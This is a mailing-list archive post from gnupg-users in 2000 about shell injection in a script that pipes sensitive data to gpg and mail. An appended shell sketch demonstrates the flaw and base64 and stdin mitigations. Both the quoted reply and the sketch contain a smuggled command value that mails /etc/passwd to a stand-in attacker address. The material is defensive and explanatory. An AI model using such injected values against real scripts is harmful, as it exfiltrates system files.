possible security hole

Derek Vokey turfdog@planetturf.ca
Mon, 4 Dec 2000 21:26:59 -0800


Thank you for your input.
Could I bother you to "briefly" explain encoding to base64?

----- Original Message -----
From: "Jason Martin" <jhmartin@mail.com>
To: "Derek Vokey" <turfdog@planetturf.ca>
Cc: <gnupg-users@gnupg.org>
Sent: Monday, December 04, 2000 5:05 PM
Subject: Re: possible security hole



> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I believe possible exploits are if $sensitiveinfo contains things like
> "blah; mail someone.evil@hacker.org </etc/passwd". The idea is that the
> shell can be tricked depending on $sensitiveinfo to do things you don't
> intend. Maybe if you base64 encode $sensitiveinfo first you'll be
> more-or-less immune from shell exploits. From a purely crypto point of
> view, I don't see anything wrong with this if we assume that
> $sensitiveinfo is guaranteed to have shell-safe values.
>
> - -Jason Martin
>
> > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail to\@me.com"
> >
> > the script runs as nobody
> > the secret key has never seen the server
> > the script only encrypts
> > I don't care who the message comes from I only want the $sensitiveinfo
>
> - --
> PGP KeyID=0xEA954813
> Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813
> finger jhmartin@pitr.scs.wsu.edu for key
>
> --
> Archive is at http://lists.gnupg.org - Unsubscribe by sending mail
> with a subject of "unsubscribe" to gnupg-users-request@gnupg.org
>
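As an added example (not code from either poster), a POSIX shell sketch of the two points in the thread: why splicing $sensitiveinfo into a command string is dangerous, and what base64 encoding does to the value so that it can be spliced safely. It assumes GNU coreutils base64(1); the hostile value and the command list passed to pipe_to_stdin are constructed for the demonstration.

```shell
#!/bin/sh
# Added example for this thread, not code from either poster.
# Assumes GNU coreutils base64(1). The hostile value is constructed,
# modelled on the one Jason describes.

# 1. The risky pattern: the value is pasted into a command *string*
#    before the shell parses it (the \@ in the original suggests the
#    calling script interpolates it), so ';', '|' and '<' inside the
#    value become shell syntax. This function only builds the string
#    so it can be inspected; it never runs it.
build_cmd_string() {
    printf 'echo %s|gpg --homedir /my/home/dir --always-trust -ear me|mail to@me.com' "$1"
}

# 2. base64: every 3 input bytes become 4 characters drawn from
#    A-Z a-z 0-9 + / (plus '=' padding). None of these is special to
#    the shell, so an encoded value cannot end or extend the command.
b64_encode() { printf '%s' "$1" | base64 | tr -d '\n'; }
b64_decode() { printf '%s' "$1" | base64 -d; }

# Exit 0 only if the string consists of base64-alphabet characters.
is_shell_safe() {
    case "$1" in
        *[!A-Za-z0-9+/=]*) return 1 ;;
        *) return 0 ;;
    esac
}

# 3. The fix that needs no encoding: write the value to the child's
#    stdin through a pipe and give the command as an argument list
#    ("$@"), so no shell ever re-parses the value.
pipe_to_stdin() { value=$1; shift; printf '%s' "$value" | "$@"; }

# Constructed hostile value, in the spirit of the one in the thread.
HOSTILE='blah; mail someone.evil@example.org </etc/passwd'

echo "command string the original script would build:"
build_cmd_string "$HOSTILE"; echo
enc=$(b64_encode "$HOSTILE")
echo "base64 form, safe to splice into a command: $enc"
echo "decodes back to: $(b64_decode "$enc")"
```

The recipient then has to base64-decode the plaintext after gpg decrypts it, and the encoded form is about a third longer than the original.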